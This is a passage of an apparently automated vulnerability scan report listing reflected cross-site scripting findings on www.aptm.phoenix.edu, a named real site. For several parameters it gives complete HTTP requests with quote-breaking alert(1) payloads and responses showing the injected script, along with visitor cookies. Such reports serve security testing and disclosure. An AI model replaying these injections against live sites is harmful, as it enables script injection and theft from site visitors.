GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048548.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: vid=51922307; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up?
    */

   var an_a
...[SNIP]...

5.202. http://www.aptm.phoenix.edu/ [user3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:15 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809464.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: vid=51921869; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up?
    */

   var an_arruids = n
...[SNIP]...

5.203. http://www.aptm.phoenix.edu/ [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:33 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134478364.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: vid=51922053; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
   
       setAllowDestURLOnSubmit(tr
...[SNIP]...

5.204. http://www.aptm.phoenix.edu/AptiNet/hhs [level_education parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-137ab"%3balert(1)//63ddfe10507a70ca9&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:59:55 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:14:02 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:14:02 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60205

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
el_education|36214_7718_98_95|143206",143060);doDynamicSelect("level_education|36214_7718_98_95|143206|REQUIRED", doDriveWithBrowserCachedValues("level_education|36214_7718_98_95|143206|REQUIRED", "-X-137ab";alert(1)//63ddfe10507a70ca9"),true,"","state|36214_7718_98_95|143098","program_type|36214_7718_98_95|143100","program_type2|36214_7718_98_95|143208","registered_nurse|36214_7718_98_95|143180",143060);doDynamicSelect("program_typ
...[SNIP]...

5.205. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=824bc"%3balert(1)//faa69d1e4cac8c868&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:12:41 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:12:41 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60235

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
documentmultipageformat = 'MULTIPAGEFORMAT=Y';
       doDynamicSelect("program_type|36214_7718_98_95|143100|OPTIONAL", doDriveWithBrowserCachedValues("program_type|36214_7718_98_95|143100|OPTIONAL", "824bc";alert(1)//faa69d1e4cac8c868"),true,"","state|36214_7718_98_95|143098","program_type2|36214_7718_98_95|143208","registered_nurse|36214_7718_98_95|143180","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("level_ed
...[SNIP]...

5.206. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1c5d8f"%3balert(1)//b75aa6850b1597960&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:58:59 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:13:06 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:13:06 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60140

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
,"registered_nurse|36214_7718_98_95|143180",143060);doDynamicSelect("program_type2|36214_7718_98_95|143208|REQUIRED", doDriveWithBrowserCachedValues("program_type2|36214_7718_98_95|143208|REQUIRED", "1c5d8f";alert(1)//b75aa6850b1597960"),true,"","state|36214_7718_98_95|143098","program_type|36214_7718_98_95|143100","registered_nurse|36214_7718_98_95|143180","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("registere
...[SNIP]...

5.207. http://www.aptm.phoenix.edu/AptiNet/hhs [registered_nurse parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no2e90f"%3balert(1)//35db81cf6d89d4995&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:04:00 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBo